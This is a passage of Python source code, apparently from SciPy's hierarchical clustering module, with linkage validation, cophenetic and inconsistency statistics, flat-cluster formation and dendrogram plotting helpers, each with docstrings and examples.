assignment of cluster ids to clusters.
Returns
-------
tree : ClusterNode
A reference to the root ClusterNode object, or the tuple ``(r, d)``
when ``rd`` is True.
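Examples
--------
A short illustrative sketch (hypothetical condensed distances):

>>> from scipy.cluster.hierarchy import linkage, to_tree
>>> Z = linkage([2., 8., 10., 8., 10., 2.], method='single')
>>> root = to_tree(Z)
>>> root.get_count()             # all four original observations sit below the root
4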
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# The number of original objects is equal to the number of rows plus
# one.
n = Z.shape[0] + 1
# Create a list full of None's to store the node objects
d = [None] * (n * 2 - 1)
# Create the nodes corresponding to the n original objects.
for i in xrange(0, n):
d[i] = ClusterNode(i)
nd = None
for i in xrange(0, n - 1):
fi = int(Z[i, 0])
fj = int(Z[i, 1])
if fi > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 0') % fi)
if fj > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 1') % fj)
nd = ClusterNode(i + n, d[fi], d[fj], Z[i, 2])
# ^ id ^ left ^ right ^ dist
if Z[i, 3] != nd.count:
raise ValueError(('Corrupt matrix Z. The count Z[%d,3] is '
'incorrect.') % i)
d[n + i] = nd
if rd:
return (nd, d)
else:
return nd
def _convert_to_bool(X):
if X.dtype != bool:
X = X.astype(bool)
if not X.flags.contiguous:
X = X.copy()
return X
def _convert_to_double(X):
if X.dtype != np.double:
X = X.astype(np.double)
if not X.flags.contiguous:
X = X.copy()
return X
def cophenet(Z, Y=None):
"""
Calculates the cophenetic distances between each observation in
the hierarchical clustering defined by the linkage ``Z``.
Suppose ``p`` and ``q`` are original observations in
disjoint clusters ``s`` and ``t``, respectively and
``s`` and ``t`` are joined by a direct parent cluster
``u``. The cophenetic distance between observations
``i`` and ``j`` is simply the distance between
clusters ``s`` and ``t``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as an array
(see ``linkage`` function).
Y : ndarray (optional)
The condensed distance matrix from which `Z` was generated.
When provided, the cophenetic correlation coefficient ``c`` of
the hierarchical clustering defined by `Z` is also computed and
returned.
Returns
-------
c : ndarray
The cophenetic correlation coefficient (only returned if ``Y`` is passed).
d : ndarray
The cophenetic distance matrix in condensed form. The
:math:`ij` th entry is the cophenetic distance between
original observations :math:`i` and :math:`j`.
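Examples
--------
An illustrative sketch (hypothetical condensed distances):

>>> from scipy.cluster.hierarchy import linkage, cophenet
>>> y = [2., 8., 10., 8., 10., 2.]
>>> Z = linkage(y, method='single')
>>> d = cophenet(Z)
>>> d.shape                      # condensed form, same length as ``y``
(6,)
>>> c, d = cophenet(Z, y)        # additionally computes the correlation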
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
zz = np.zeros((n * (n - 1)) // 2, dtype=np.double)
# The underlying C code does not support strided arrays; it relies on
# the array dimensions instead, so ensure a contiguous copy.
Z = _convert_to_double(Z)
_hierarchy.cophenetic_distances(Z, zz, int(n))
if Y is None:
return zz
Y = np.asarray(Y, order='c')
distance.is_valid_y(Y, throw=True, name='Y')
z = zz.mean()
y = Y.mean()
Yy = Y - y
Zz = zz - z
numerator = (Yy * Zz)
denomA = Yy ** 2
denomB = Zz ** 2
c = numerator.sum() / np.sqrt((denomA.sum() * denomB.sum()))
return (c, zz)
def inconsistent(Z, d=2):
"""
Calculates inconsistency statistics on a linkage.
Note: This function behaves similarly to the MATLAB(TM)
inconsistent function.
Parameters
----------
Z : ndarray
The :math:`(n-1)` by 4 matrix encoding the linkage
(hierarchical clustering). See ``linkage`` documentation
for more information on its form.
d : int, optional
The number of links up to `d` levels below each
non-singleton cluster.
Returns
-------
R : ndarray
A :math:`(n-1)` by 4 matrix where the ``i``'th row
contains the link statistics for the non-singleton cluster
``i``. The link statistics are computed over the link
heights for links :math:`d` levels below the cluster
``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard
deviation of the link heights, respectively; ``R[i,2]`` is
the number of links included in the calculation; and
``R[i,3]`` is the inconsistency coefficient,
.. math:: \\frac{\\mathtt{Z[i,2]}-\\mathtt{R[i,0]}} {R[i,1]}
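Examples
--------
A brief illustrative sketch (hypothetical condensed distances):

>>> from scipy.cluster.hierarchy import linkage, inconsistent
>>> Z = linkage([2., 8., 10., 8., 10., 2.], method='single')
>>> R = inconsistent(Z)
>>> R.shape                      # one row of statistics per non-singleton cluster
(3, 4)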
"""
Z = np.asarray(Z, order='c')
Zs = Z.shape
is_valid_linkage(Z, throw=True, name='Z')
if (not d == np.floor(d)) or d < 0:
raise ValueError('The second argument d must be a nonnegative '
'integer value.')
# The underlying C code does not support strided arrays; it relies on
# the array dimensions instead, so ensure a contiguous copy.
[Z] = _copy_arrays_if_base_present([Z])
n = Zs[0] + 1
R = np.zeros((n - 1, 4), dtype=np.double)
_hierarchy.inconsistent(Z, R, int(n), int(d))
return R
def from_mlab_linkage(Z):
"""
Converts a linkage matrix generated by MATLAB(TM) to a new
linkage matrix compatible with this module.
The conversion does two things:
* the indices are converted from ``1..N`` to ``0..(N-1)`` form,
and
* a fourth column Z[:,3] is added where Z[i,3] represents the
number of original observations (leaves) in the non-singleton
cluster i.
This function is useful when loading in linkages from legacy data
files generated by MATLAB.
Parameters
----------
Z : ndarray
A linkage matrix generated by MATLAB(TM).
Returns
-------
ZS : ndarray
A linkage matrix compatible with this library.
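Examples
--------
A minimal sketch with a hypothetical MATLAB(TM)-style linkage (1-based
indices, no count column):

>>> import numpy as np
>>> from scipy.cluster.hierarchy import from_mlab_linkage
>>> ZM = np.array([[1., 2., 0.3],
...                [3., 4., 0.7],
...                [5., 6., 1.2]])
>>> Z = from_mlab_linkage(ZM)
>>> Z.shape                      # 0-based indices plus an added count column
(3, 4)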
"""
Z = np.asarray(Z, dtype=np.double, order='c')
Zs = Z.shape
# If it's empty, return it.
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
if len(Zs) != 2:
raise ValueError("The linkage array must be rectangular.")
# If it contains no rows, return it.
if Zs[0] == 0:
return Z.copy()
Zpart = Z.copy()
if Zpart[:, 0:2].min() != 1.0 and Zpart[:, 0:2].max() != 2 * Zs[0]:
raise ValueError('The format of the indices is not 1..N')
Zpart[:, 0:2] -= 1.0
CS = np.zeros((Zs[0],), dtype=np.double)
_hierarchy.calculate_cluster_sizes(Zpart, CS, int(Zs[0]) + 1)
return np.hstack([Zpart, CS.reshape(Zs[0], 1)])
def to_mlab_linkage(Z):
"""
Converts a linkage matrix to a MATLAB(TM) compatible one.
Converts a linkage matrix ``Z`` generated by the linkage function
of this module to a MATLAB(TM) compatible one. The return linkage
matrix has the last column removed and the cluster indices are
converted to ``1..N`` indexing.
Parameters
----------
Z : ndarray
A linkage matrix generated by this library.
Returns
-------
to_mlab_linkage : ndarray
A linkage matrix compatible with MATLAB(TM)'s hierarchical
clustering functions.
The return linkage matrix has the last column removed
and the cluster indices are converted to ``1..N`` indexing.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
Zs = Z.shape
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
is_valid_linkage(Z, throw=True, name='Z')
ZP = Z[:, 0:3].copy()
ZP[:, 0:2] += 1.0
return ZP
def is_monotonic(Z):
"""
Returns True if the linkage passed is monotonic.
The linkage is monotonic if for every cluster :math:`s` and :math:`t`
joined, the distance between them is no less than the distance
between any previously joined clusters.
Parameters
----------
Z : ndarray
The linkage matrix to check for monotonicity.
Returns
-------
b : bool
A boolean indicating whether the linkage is monotonic.
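Examples
--------
A small illustrative check; single linkage always produces a monotonic
hierarchy, so the hypothetical distances below yield True:

>>> from scipy.cluster.hierarchy import linkage, is_monotonic
>>> Z = linkage([2., 8., 10., 8., 10., 2.], method='single')
>>> bool(is_monotonic(Z))
True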
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# We expect each merge distance to be no less than the previous one.
return (Z[1:, 2] >= Z[:-1, 2]).all()
def is_valid_im(R, warning=False, throw=False, name=None):
"""Returns True if the inconsistency matrix passed is valid.
It must be a :math:`n` by 4 numpy array of doubles. The standard
deviations ``R[:,1]`` must be nonnegative. The link counts
``R[:,2]`` must be positive and no greater than :math:`n-1`.
Parameters
----------
R : ndarray
The inconsistency matrix to check for validity.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True if the inconsistency matrix is valid.
"""
R = np.asarray(R, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(R) != np.ndarray:
raise TypeError('Variable %spassed as inconsistency matrix is not '
'a numpy array.' % name_str)
if R.dtype != np.double:
raise TypeError('Inconsistency matrix %smust contain doubles '
'(double).' % name_str)
if len(R.shape) != 2:
raise ValueError('Inconsistency matrix %smust have shape=2 (i.e. '
'be two-dimensional).' % name_str)
if R.shape[1] != 4:
raise ValueError('Inconsistency matrix %smust have 4 columns.' %
name_str)
if R.shape[0] < 1:
raise ValueError('Inconsistency matrix %smust have at least one '
'row.' % name_str)
if (R[:, 0] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height means.' % name_str)
if (R[:, 1] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height standard deviations.' % name_str)
if (R[:, 2] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'counts.' % name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def is_valid_linkage(Z, warning=False, throw=False, name=None):
"""
Checks the validity of a linkage matrix.
A linkage matrix is valid if it is a two-dimensional
ndarray (type double) with :math:`n-1`
rows and 4 columns, where :math:`n` is the number of original
observations. The first two columns must contain indices
between 0 and :math:`2n-1`. For a given row ``i``,
:math:`0 \\leq \\mathtt{Z[i,0]} \\leq i+n-1`
and :math:`0 \\leq Z[i,1] \\leq i+n-1`
(i.e. a cluster cannot join another cluster unless the cluster
being joined has been generated.)
Parameters
----------
Z : array_like
Linkage matrix.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True if the linkage matrix is valid.
"""
Z = np.asarray(Z, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(Z) != np.ndarray:
raise TypeError('Passed linkage argument %sis not a valid array.' %
name_str)
if Z.dtype != np.double:
raise TypeError('Linkage matrix %smust contain doubles.' % name_str)
if len(Z.shape) != 2:
raise ValueError('Linkage matrix %smust have shape=2 (i.e. be '
'two-dimensional).' % name_str)
if Z.shape[1] != 4:
raise ValueError('Linkage matrix %smust have 4 columns.' % name_str)
if Z.shape[0] == 0:
raise ValueError('Linkage must be computed on at least two '
'observations.')
n = Z.shape[0]
if n > 1:
if ((Z[:, 0] < 0).any() or (Z[:, 1] < 0).any()):
raise ValueError('Linkage %scontains negative indices.' %
name_str)
if (Z[:, 2] < 0).any():
raise ValueError('Linkage %scontains negative distances.' %
name_str)
if (Z[:, 3] < 0).any():
raise ValueError('Linkage %scontains negative counts.' %
name_str)
if _check_hierarchy_uses_cluster_before_formed(Z):
raise ValueError('Linkage %suses non-singleton cluster before '
'it is formed.' % name_str)
if _check_hierarchy_uses_cluster_more_than_once(Z):
raise ValueError('Linkage %suses the same cluster more than once.'
% name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def _check_hierarchy_uses_cluster_before_formed(Z):
n = Z.shape[0] + 1
for i in xrange(0, n - 1):
if Z[i, 0] >= n + i or Z[i, 1] >= n + i:
return True
return False
def _check_hierarchy_uses_cluster_more_than_once(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
if (Z[i, 0] in chosen) or (Z[i, 1] in chosen) or Z[i, 0] == Z[i, 1]:
return True
chosen.add(Z[i, 0])
chosen.add(Z[i, 1])
return False
def _check_hierarchy_not_all_clusters_used(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
chosen.add(int(Z[i, 0]))
chosen.add(int(Z[i, 1]))
must_chosen = set(range(0, 2 * n - 2))
return len(must_chosen.difference(chosen)) > 0
def num_obs_linkage(Z):
"""
Returns the number of original observations of the linkage matrix
passed.
Parameters
----------
Z : ndarray
The linkage matrix on which to perform the operation.
Returns
-------
n : int
The number of original observations in the linkage.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
return (Z.shape[0] + 1)
def correspond(Z, Y):
"""
Checks for correspondence between linkage and condensed distance matrices
They must have the same number of original observations for
the check to succeed.
This function is useful as a sanity check in algorithms that make
extensive use of linkage and distance matrices that must
correspond to the same set of original observations.
Parameters
----------
Z : array_like
The linkage matrix to check for correspondence.
Y : array_like
The condensed distance matrix to check for correspondence.
Returns
-------
b : bool
A boolean indicating whether the linkage matrix and distance
matrix could possibly correspond to one another.
"""
is_valid_linkage(Z, throw=True)
distance.is_valid_y(Y, throw=True)
Z = np.asarray(Z, order='c')
Y = np.asarray(Y, order='c')
return distance.num_obs_y(Y) == num_obs_linkage(Z)
def fcluster(Z, t, criterion='inconsistent', depth=2, R=None, monocrit=None):
"""
Forms flat clusters from the hierarchical clustering defined by
the linkage matrix ``Z``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded with the matrix returned
by the `linkage` function.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
The criterion to use in forming flat clusters. This can
be any of the following values:
``inconsistent`` : If a cluster node and all its
descendants have an inconsistent value less than or equal
to `t` then all its leaf descendants belong to the
same flat cluster. When no non-singleton cluster meets
this criterion, every node is assigned to its own
cluster. (Default)
``distance`` : Forms flat clusters so that the original
observations in each flat cluster have a cophenetic
distance no greater than `t`.
``maxclust`` : Finds a minimum threshold ``r`` so that
the cophenetic distance between any two original
observations in the same flat cluster is no more than
``r`` and no more than `t` flat clusters are formed.
``monocrit`` : Forms a flat cluster from a cluster node c
with index i when ``monocrit[j] <= t``.
For example, to threshold on the maximum mean distance
as computed in the inconsistency matrix R with a
threshold of 0.8 do:
MR = maxRstat(Z, R, 3)
cluster(Z, t=0.8, criterion='monocrit', monocrit=MR)
``maxclust_monocrit`` : Forms a flat cluster from a
non-singleton cluster node ``c`` when ``monocrit[i] <=
r`` for all cluster indices ``i`` below and including
``c``. ``r`` is minimized such that no more than ``t``
flat clusters are formed. monocrit must be
monotonic. For example, to minimize the threshold t on
maximum inconsistency values so that no more than 3 flat
clusters are formed, do:
MI = maxinconsts(Z, R)
cluster(Z, t=3, criterion='maxclust_monocrit', monocrit=MI)
depth : int, optional
The maximum depth to perform the inconsistency calculation.
It has no meaning for the other criteria. Default is 2.
R : ndarray, optional
The inconsistency matrix to use for the 'inconsistent'
criterion. This matrix is computed if not provided.
monocrit : ndarray, optional
An array of length n-1. `monocrit[i]` is the
statistic upon which non-singleton cluster i is thresholded. The
monocrit vector must be monotonic, i.e. given a node c with
index i, for all node indices j corresponding to nodes
below c, `monocrit[i] >= monocrit[j]`.
Returns
-------
fcluster : ndarray
An array of length n. T[i] is the flat cluster number to
which original observation i belongs.
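Examples
--------
An illustrative sketch (hypothetical observations); the 'distance'
criterion is used so the result does not depend on an inconsistency
matrix:

>>> import numpy as np
>>> from scipy.spatial.distance import pdist
>>> from scipy.cluster.hierarchy import linkage, fcluster
>>> X = [[0, 0], [0, 1], [1, 0], [4, 4], [4, 5]]
>>> Z = linkage(pdist(X), method='single')
>>> T = fcluster(Z, t=2.0, criterion='distance')
>>> len(np.unique(T))            # two well separated groups of points
2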
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
T = np.zeros((n,), dtype='i')
# The underlying C code does not support strided arrays; it relies on
# the array dimensions instead, so ensure a contiguous copy.
[Z] = _copy_arrays_if_base_present([Z])
if criterion == 'inconsistent':
if R is None:
R = inconsistent(Z, depth)
else:
R = np.asarray(R, order='c')
is_valid_im(R, throw=True, name='R')
# The underlying C code does not support strided arrays; it relies on
# the array dimensions instead, so ensure a contiguous copy.
[R] = _copy_arrays_if_base_present([R])
_hierarchy.cluster_in(Z, R, T, float(t), int(n))
elif criterion == 'distance':
_hierarchy.cluster_dist(Z, T, float(t), int(n))
elif criterion == 'maxclust':
_hierarchy.cluster_maxclust_dist(Z, T, int(n), int(t))
elif criterion == 'monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_monocrit(Z, monocrit, T, float(t), int(n))
elif criterion == 'maxclust_monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_maxclust_monocrit(Z, monocrit, T, int(n), int(t))
else:
raise ValueError('Invalid cluster formation criterion: %s'
% str(criterion))
return T
def fclusterdata(X, t, criterion='inconsistent',
metric='euclidean', depth=2, method='single', R=None):
"""
Cluster observation data using a given metric.
Clusters the original observations in the n-by-m data
matrix X (n observations in m dimensions), using the given
distance metric (Euclidean by default) to calculate distances
between original observations, performs hierarchical clustering
using the chosen linkage method (single by default), and forms
flat clusters using the inconsistency method with `t` as the
cut-off threshold.
A one-dimensional array T of length n is returned. T[i] is the index
of the flat cluster to which the original observation i belongs.
Parameters
----------
X : (N, M) ndarray
N by M data matrix with N observations in M dimensions.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
Specifies the criterion for forming flat clusters. Valid
values are 'inconsistent' (default), 'distance', or 'maxclust'
cluster formation algorithms. See `fcluster` for descriptions.
metric : str, optional
The distance metric for calculating pairwise distances. See
`distance.pdist` for descriptions and linkage to verify
compatibility with the linkage method.
depth : int, optional
The maximum depth for the inconsistency calculation. See
`inconsistent` for more information.
method : str, optional
The linkage method to use (single, complete, average,
weighted, median, centroid, ward). See `linkage` for more
information. Default is "single".
R : ndarray, optional
The inconsistency matrix. It will be computed if necessary
if it is not passed.
Returns
-------
fclusterdata : ndarray
A vector of length n. T[i] is the flat cluster number to
which original observation i belongs.
Notes
-----
This function is similar to the MATLAB function clusterdata.
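Examples
--------
An illustrative sketch on hypothetical data, cutting the hierarchy at a
distance threshold:

>>> import numpy as np
>>> from scipy.cluster.hierarchy import fclusterdata
>>> X = [[0, 0], [0, 1], [1, 0], [4, 4], [4, 5]]
>>> T = fclusterdata(X, t=2.0, criterion='distance')
>>> len(np.unique(T))
2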
"""
X = np.asarray(X, order='c', dtype=np.double)
if type(X) != np.ndarray or len(X.shape) != 2:
raise TypeError('The observation matrix X must be an n by m numpy '
'array.')
Y = distance.pdist(X, metric=metric)
Z = linkage(Y, method=method)
if R is None:
R = inconsistent(Z, d=depth)
else:
R = np.asarray(R, order='c')
T = fcluster(Z, criterion=criterion, depth=depth, R=R, t=t)
return T
def leaves_list(Z):
"""
Returns a list of leaf node ids
The return corresponds to the observation vector index as it appears
in the tree from left to right. Z is a linkage matrix.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. `Z` is
a linkage matrix. See ``linkage`` for more information.
Returns
-------
leaves_list : ndarray
The list of leaf node ids.
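Examples
--------
A short illustrative sketch (hypothetical condensed distances):

>>> from scipy.cluster.hierarchy import linkage, leaves_list
>>> Z = linkage([2., 8., 10., 8., 10., 2.], method='single')
>>> ML = leaves_list(Z)
>>> sorted(int(i) for i in ML)   # every original observation appears once
[0, 1, 2, 3]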
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
ML = np.zeros((n,), dtype='i')
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.prelist(Z, ML, int(n))
return ML
# Maps number of leaves to text size.
#
# p <= 20, size="12"
# 20 < p <= 30, size="10"
# 30 < p <= 50, size="8"
# 50 < p <= 85, size="6"
# 85 < p <= np.inf, size="5"
_dtextsizes = {20: 12, 30: 10, 50: 8, 85: 6, np.inf: 5}
_drotation = {20: 0, 40: 45, np.inf: 90}
_dtextsortedkeys = list(_dtextsizes.keys())
_dtextsortedkeys.sort()
_drotationsortedkeys = list(_drotation.keys())
_drotationsortedkeys.sort()
def _remove_dups(L):
"""
Removes duplicates AND preserves the original order of the elements.
The set class is not guaranteed to do this.
"""
seen_before = set([])
L2 = []
for i in L:
if i not in seen_before:
seen_before.add(i)
L2.append(i)
return L2
def _get_tick_text_size(p):
for k in _dtextsortedkeys:
if p <= k:
return _dtextsizes[k]
def _get_tick_rotation(p):
for k in _drotationsortedkeys:
if p <= k:
return _drotation[k]
def _plot_dendrogram(icoords, dcoords, ivl, p, n, mh, orientation,
no_labels, color_list, leaf_font_size=None,
leaf_rotation=None, contraction_marks=None,
ax=None, above_threshold_color='b'):
# Import matplotlib here so that it's not imported unless dendrograms
# are plotted. Raise an informative error if importing fails.
try:
# if an axis is provided, don't use pylab at all
if ax is None:
import matplotlib.pylab
import matplotlib.patches
import matplotlib.collections
except ImportError:
raise ImportError("You must install the matplotlib library to plot the dendrogram. Use no_plot=True to calculate the dendrogram without plotting.")
if ax is None:
ax = matplotlib.pylab.gca()
# if we're using pylab, we want to trigger a draw at the end
trigger_redraw = True
else:
trigger_redraw = False
# Independent variable plot width
ivw = len(ivl) * 10
# Dependent variable plot height
dvw = mh + mh * 0.05
ivticks = np.arange(5, len(ivl) * 10 + 5, 10)
if orientation == 'top':
ax.set_ylim([0, dvw])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
ax.xaxis.set_ticks_position('bottom')
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(len(ivl)))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(len(ivl)))
for lbl in lbls:
lbl.set_size(leaf_fs)
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'bottom':
ax.set_ylim([dvw, 0])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(p))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(p))
for lbl in lbls:
lbl.set_size(leaf_fs)
ax.xaxis.set_ticks_position('top')
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'left':
ax.set_xlim([0, dvw])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('left')
# Make the tick marks invisible because they cover up the
# links
for line in ax.get_yticklines():
line.set_visible(False)
elif orientation == 'right':
ax.set_xlim([dvw, 0])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('right')
# Make the tick marks invisible because they cover up the links
for line in ax.get_yticklines():
line.set_visible(False)
# Let's use collections instead. This way there is a separate legend
# item for each tree grouping, rather than stupidly one for each line
# segment.
colors_used = _remove_dups(color_list)
color_to_lines = {}
for color in colors_used:
color_to_lines[color] = []
for (xline, yline, color) in zip(xlines, ylines, color_list):
color_to_lines[color].append(list(zip(xline, yline)))
colors_to_collections = {}
# Construct the collections.
for color in colors_used:
coll = matplotlib.collections.LineCollection(color_to_lines[color],
colors=(color,))
colors_to_collections[color] = coll
# Add all the groupings below the color threshold.
for color in colors_used:
if color != above_threshold_color:
ax.add_collection(colors_to_collections[color])
# If there is a grouping of links above the color threshold,
# it should go last.
if above_threshold_color in colors_to_collections:
ax.add_collection(colors_to_collections[above_threshold_color])
if contraction_marks is not None:
if orientation in ('left', 'right'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((y, x),
width=dvw / 100, height=1.0)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if orientation in ('top', 'bottom'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((x, y),
width=1.0, height=dvw / 100)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if trigger_redraw:
matplotlib.pylab.draw_if_interactive()
_link_line_colors = ['g', 'r', 'c', 'm', 'y', 'k']
def set_link_color_palette(palette):
"""
Set list of matplotlib color codes for dendrogram color_threshold.
Parameters
----------
palette : list
A list of matplotlib color codes. The order of
the color codes is the order in which the colors are cycled
through when color thresholding in the dendrogram.
"""
if type(palette) not in (list, tuple):
raise TypeError("palette must be a list or tuple")
_ptypes = [isinstance(p, string_types) for p in palette]
if False in _ptypes:
raise TypeError("all palette list elements must be color strings")
for i in list(_link_line_colors):
_link_line_colors.remove(i)
_link_line_colors.extend(list(palette))
def dendrogram(Z, p=30, truncate_mode=None, color_threshold=None,
get_leaves=True, orientation='top', labels=None,
count_sort=False, distance_sort=False, show_leaf_counts=True,
no_plot=False, no_labels=False, color_list=None,
leaf_font_size=None, leaf_rotation=None, leaf_label_func=None,
no_leaves=False, show_contracted=False,
link_color_func=None, ax=None, above_threshold_color='b'):
"""
Plots the hierarchical clustering as a dendrogram.
The dendrogram illustrates how each cluster is
composed by drawing a U-shaped link between a non-singleton
cluster and its children. The height of the top of the U-link is
the distance between its children clusters. It is also the
cophenetic distance between original observations in the two
children clusters. It is expected that the distances in Z[:,2] be
monotonic, otherwise crossings appear in the dendrogram.
Parameters
----------
Z : ndarray
The linkage matrix encoding the hierarchical clustering to
render as a dendrogram. See the ``linkage`` function for more
information on the format of ``Z``.
p : int, optional
The ``p`` parameter for ``truncate_mode``.
truncate_mode : str, optional
The dendrogram can be hard to read when the original
observation matrix from which the linkage is derived is
large. Truncation is used to condense the dendrogram. There
are several modes:
``None/'none'``
No truncation is performed (Default).
``'lastp'``
The last ``p`` non-singleton clusters formed in the linkage are the only
non-leaf nodes in the linkage; they correspond to rows
``Z[n-p-2:end]`` in ``Z``. All other non-singleton clusters are
contracted into leaf nodes.
``'mlab'``
This corresponds to MATLAB(TM) behavior. (not implemented yet)
``'level'/'mtica'``
No more than ``p`` levels of the dendrogram tree are displayed.
This corresponds to Mathematica(TM) behavior.
color_threshold : double, optional
For brevity, let :math:`t` be the ``color_threshold``.
Colors all the descendent links below a cluster node
:math:`k` the same color if :math:`k` is the first node below
the cut threshold :math:`t`. All links connecting nodes with
distances greater than or equal to the threshold are colored
blue. If :math:`t` is less than or equal to zero, all nodes
are colored blue. If ``color_threshold`` is None or
'default', corresponding with MATLAB(TM) behavior, the
threshold is set to ``0.7*max(Z[:,2])``.
get_leaves : bool, optional
Includes a list ``R['leaves']=H`` in the result
dictionary. For each :math:`i`, ``H[i] == j``, cluster node
``j`` appears in position ``i`` in the left-to-right traversal
of the leaves, where :math:`j < 2n-1` and :math:`i < n`.
orientation : str, optional
The direction to plot the dendrogram, which can be any
of the following strings:
``'top'``
Plots the root at the top, and plots descendent links going downwards.
(default).
``'bottom'``
Plots the root at the bottom, and plots descendent links going
upwards.
``'left'``
Plots the root at the left, and plots descendent links going right.
``'right'``
Plots the root at the right, and plots descendent links going left.
labels : ndarray, optional
By default ``labels`` is None so the index of the original observation
is used to label the leaf nodes. Otherwise, this is an :math:`n`
-sized list (or tuple). The ``labels[i]`` value is the text to put
under the :math:`i` th leaf node only if it corresponds to an original
observation and not a non-singleton cluster.
count_sort : str or bool, optional
For each node n, the order (visually, from left to right) in which
n's two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum number of original objects in its cluster
is plotted first.
``'descending'``
The child with the maximum number of original objects in its cluster
is plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
distance_sort : str or bool, optional
For each node n, the order (visually, from left to right) in which
n's two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum distance between its direct descendents is
plotted first.
``'descending'``
The child with the maximum distance between its direct descendents is
plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
show_leaf_counts : bool, optional
When True, leaf nodes representing :math:`k>1` original
observations are labeled with the number of observations they
contain in parentheses.
no_plot : bool, optional
When True, the final rendering is not performed. This is
useful if only the data structures computed for the rendering
are needed or if matplotlib is not available.
no_labels : bool, optional
When True, no labels appear next to the leaf nodes in the
rendering of the dendrogram.
leaf_rotation : double, optional
Specifies the angle (in degrees) to rotate the leaf
labels. When unspecified, the rotation is based on the number of
nodes in the dendrogram (default is 0).
leaf_font_size : int, optional
Specifies the font size (in points) of the leaf labels. When
unspecified, the size is based on the number of nodes in the
dendrogram.
